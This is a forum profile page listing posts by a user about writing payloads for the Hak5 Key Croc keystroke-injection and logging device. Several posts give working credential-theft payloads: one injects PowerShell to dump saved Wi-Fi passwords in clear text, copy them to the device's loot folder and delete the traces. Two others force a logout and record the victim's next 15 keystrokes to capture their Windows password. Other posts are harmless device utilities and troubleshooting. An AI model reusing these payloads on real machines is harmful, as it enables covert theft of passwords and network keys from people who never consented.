Jump to content

RootJunky

Active Members
  • Content Count

    18
  • Joined

  • Last visited

Everything posted by RootJunky

  1. This what i have so far MATCH wifidesktop QUACK LOCK QUACK DELAY 1000 # --> Minimize all windows QUACK GUI d # --> Open cmd QUACK GUI r QUACK DELAY 500 QUACK STRING powershell QUACK ENTER QUACK DELAY 500 # --> Get all SSID QUACK STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name=\$_.Matches.Groups\[1\].Value.Trim\(\)\; \$_\} \| \%\{\(netsh wlan show profile name=\"\$name\" key=clear\)\} \| Select-String \"Key Content\\W+\\:\(.+\)\$\" \| \%\{\$pass=\$_.Matches.Groups\[1\].Value.Trim\(\)\; \$_\} \| \%\{\[PSCustomObject\]\@\{ PROFILE_NAME=\$name\;PASSWORD=\$pass \}\} \| Format-Table -AutoSize \| Out-File \"\$env:userprofile\\Desktop\\WirelessNetworkPasswords.txt\" QUACK DELAY 1000 QUACK ENTER # --> Available wifi networks that are visible QUACK STRING netsh wlan show networks \| Out-File \"\$env:userprofile\\Desktop\\WirelessNetworks.txt\" QUACK ENTER # --> Switching device to usb storage udisk unmount ATTACKMODE HID STORAGE QUACK DELAY 5000 # --> copy files to KeyCroc and deleting from target PC QUACK STRING \$Croc = \(gwmi win32_volume -f \'label=\"KeyCroc\"\' \| Select-Object -ExpandProperty DriveLetter\) QUACK ENTER QUACK STRING xcopy /y "Desktop\WirelessNetworks.txt" $Croc\loot\ QUACK ENTER QUACK STRING xcopy /y "Desktop\WirelessNetworkPasswords.txt" $Croc\loot\ QUACK ENTER QUACK STRING del "Desktop\WirelessNetworks.txt" QUACK ENTER QUACK STRING del "Desktop\WirelessNetworkPasswords.txt" QUACK ENTER QUACK STRING exit QUACK ENTER # --> Returning to HID Mode ATTACKMODE HID QUACK DELAY 5000 ATTACKMODE HID QUACK UNLOCK The Problem that i am having is that the ATTACKMODE HID STORAGE doesn't really mount the keycroc to my PC correctly. this makes it so that the $Croc doesn't work so that copy of the files from desktop fails. Note: if i ssh and run commands udisk unmount and ATTACKMODE HID STORAGE Then the storage shows up correctly and i can xcopy with the script.
  2. I like where you are going and you could use this command to scan what networks the target PC can see available currently netsh wlan show networks you can also use this in a payload to mount and unmount the croc udisk [ mount | unmount | remount | reformat ]
  3. you can use this string in a payload to change the SSID in the config.txt QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g') in my example the SSID is 2WIRE111 and it will get changed to KeyCroc I use this in a payload to change my SSID with MATCH wifichange
  4. totally agree this needs to be fixed in firmware version 1.4
  5. yes you nailed it when num lock is on i get 12 1 2 3 When num lock is off i get 12 Nothing as you can see but the enters.
  6. I just tested my Croc for number typing and it works just fine. Payload MATCH 12 QUACK ENTERQUACK STRING "1"QUACK ENTERQUACK STRING "2"QUACK ENTERQUACK STRING "3"QUACK ENTER typed 12 1 2 3 In fact when i typed twelve above it auto ran the Payload and typed the 1 2 3.
  7. something like this might work but if you mess it up you might loose your SSH connection to the croc. https://computingforgeeks.com/create-wi-fi-hotspot-on-ubuntu-debian-fedora-centos-arch/
  8. Yes fneagle that is a great idea but i dont know how to do that.
  9. you have to escape lots of expressions like i have in this payload with the \ symbol. https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-wifi-password-grabber.txt you have to do this because the key croc is processing those symbols as bash unlike ducky code. Rootjunky
  10. For some reason QUACK GUI L wasn't working on my machine once control alt delete was matched but QUACK STRING GUI l works.
  11. Windows Password Grabber CAD This is a simple payload used to logout ones control alt delete is pressed on a windows PC, then it will capture the next 15 buttons pressed. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber # Description: When Control Alt Delete is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[CONTROL-ALT-DELETE\] LED ATTACK STAGE1 QUACK STRING "GUI l" SAVEKEYS /root/loot/password.log NEXT 15 QUACK DELAY 1000 LED OFF https://github.com/rootjunky/keycroc-payloads/blob/master/library/examples/windows-password-grabber-ctrl-alt-delete.txt
  12. Windows Password Grabber GUI L This is a simple payload used to capture the next 15 buttons pressed once someone presses Windows button and L to log them self out of a PC. You can edit the script to your liking. The 15 buttons saved will be stored in your loot folder. # Title: Windows Password Grabber GUI L # Description: When GUI L is pressed it will long out the current user and request a password that will be captured and stored in loot. # Author: RootJunky # Version: 1.0 # Category: Credentials # # MATCH \[GUI-l] LED ATTACK STAGE1 SAVEKEYS /root/loot/password-GUI-L.log NEXT 15 QUACK DELAY 1000 LED OFF Thanks RootJunky windows-password-grabber-gui-l.txt
  13. yes i made this actually. I left password the same and just changed the SSID works pretty good. Great look forward to the new firmware v1.3 # Title: ssid changer 1 # Description: Change the ssid stored in the config file # Author: Rootjunky # Version: 1.0 # Category: Key Croc # # MATCH changewifi QUACK LOCK QUACK ENTER QUACK STRING $(grep -rl "WIFI_SSID" /root/udisk/config.txt | xargs sed -i 's/WIFI_SSID 2WIRE111/WIFI_SSID KeyCroc/g') QUACK STRING "wifi ssid changed to KeyCroc" QUACK ENTER QUACK UNLOCK
  14. yes its a logitech K270 https://www.logitech.com/en-roeu/product/wireless-keyboard-k270 I have hardware to capture the keycodes but like i said i can not get them to work from the keycroc
  15. I did a little research into why my hot keys on my keyboard are not passing through the KeyCroc. Below are my keyboard scan codes that i captured with the number 1 for comparison. I am guessing that the reason these buttons are not working is because they are not listed in the language US.json. I would love some help trouble shooting this problem and adding these hot keys and others to the KeyCroc. I tried to make a payload that would QUACK KEYCODE 03,CD,00 for example and match it with MATCH 1 but this will not play/pause for me. Thoughts. radix: hexadecimal 03 CD 00 00 00 play pause radix: hexadecimal 03 E2 00 00 00 mute unmute radix: hexadecimal 03 EA 00 00 00 volume down radix: hexadecimal 03 E9 00 00 00 volume up radix: hexadecimal 03 23 02 00 00 home radix: hexadecimal 03 8A 01 00 00 mail radix: hexadecimal 04 01 power off / sleep screen radix: hexadecimal 03 92 01 00 00 cal radix: hexadecimal 00 00 1E 00 00 00 00 00 number 1
  16. Can you edit the config.txt file to be able to connect to multiple wifi SSID's? I would like to be able to connect to a local wifi network and and mobile hotspot, not at the same time but to whichever one is in range.
  17. CrocSSH By RootJunky Key Croc SSH login is really simple to use and makes it easy to ssh into your Key Croc with one simple command into a terminal ( crocssh ). Once you enter the command the script will erase the crocssh in the terminal and enter everything including the IP into the terminal along with the default password and get you logged into the device over ssh. First login requires you to accept the secure id but after that this script will log you in without any problems. suggestions welcome to improve this payload. Must type on target keyboard. croc-ssh-payload.txt # Title: Key Croc ssh login # Description: Logs into key croc over ssh # Author: RootJunky # Version: 1.0 # Category: Key Croc # # MATCH crocssh QUACK LOCK QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK BACKSPACE QUACK STRING "ssh root@" QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK DELAY 1000 QUACK ENTER QUACK DELAY 1000 QUACK STRING "hak5croc" QUACK ENTER QUACK ENTER QUACK UNLOCK Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky
  18. CrocInfo by RootJunky Croc info grabber is a simple script to be able to grab a bunch of info about your Key Croc with a simple command ( crocinfo ) This payload is best used for development when you only have one pc to develop and test on. This payload will return Key Croc Firmware, IP, DNS, User, Password, Hostname, SSH, and current Attack Mode. Place file in payloads folder and type crocinfo on target keyboard in a notepad to display crocinfo croc-info-payload.txt # Title: Key Croc Info Grabber # Description: Returns Info on the Key Croc # Author: RootJunky # Version: 1.0 # Category: Key Croc # # MATCH crocinfo QUACK LOCK QUACK ENTER QUACK ENTER QUACK STRING "CROC FIRMWARE: " QUACK STRING $(cat /root/udisk/version.txt) QUACK ENTER QUACK ENTER QUACK STRING "IP: " QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK ENTER QUACK STRING "DNS: " QUACK STRING $(sed -n -e 4p /etc/resolv.conf) QUACK ENTER QUACK STRING "DNS: " QUACK STRING $(sed -n -e 5p /etc/resolv.conf) QUACK ENTER QUACK ENTER QUACK STRING "USER: " QUACK STRING $(whoami) QUACK ENTER QUACK ENTER QUACK STRING "PASSWORD: " QUACK STRING "hak5croc" QUACK ENTER QUACK ENTER QUACK STRING "HOSTNAME: " QUACK STRING $(cat /proc/sys/kernel/hostname) QUACK ENTER QUACK ENTER QUACK STRING "SSH: " QUACK STRING "ssh root@" QUACK STRING $(ifconfig wlan0 | grep "inet addr" | awk {'print $2'} | cut -c 6-) QUACK ENTER QUACK ENTER QUACK STRING "MODE: " QUACK STRING $(cat /tmp/mode) QUACK ENTER QUACK ENTER QUACK UNLOCK #Default Settings #username: root #password: hak5croc #hostname: croc My Results crocinfo CROC FIRMWARE:1.2_475 IP:192.168.1.36 DNS:nameserver 1.1.1.1 DNS:nameserver 8.8.8.8 USER:root PASSWORD:hak5croc HOSTNAME:croc SSH:ssh root@192.168.1.36 MODE:HID VID_0X046D PID_0XC52B Big thanks to Hak5 for this awesome and fun Key Croc. Developed by RootJunky
×
×
  • Create New...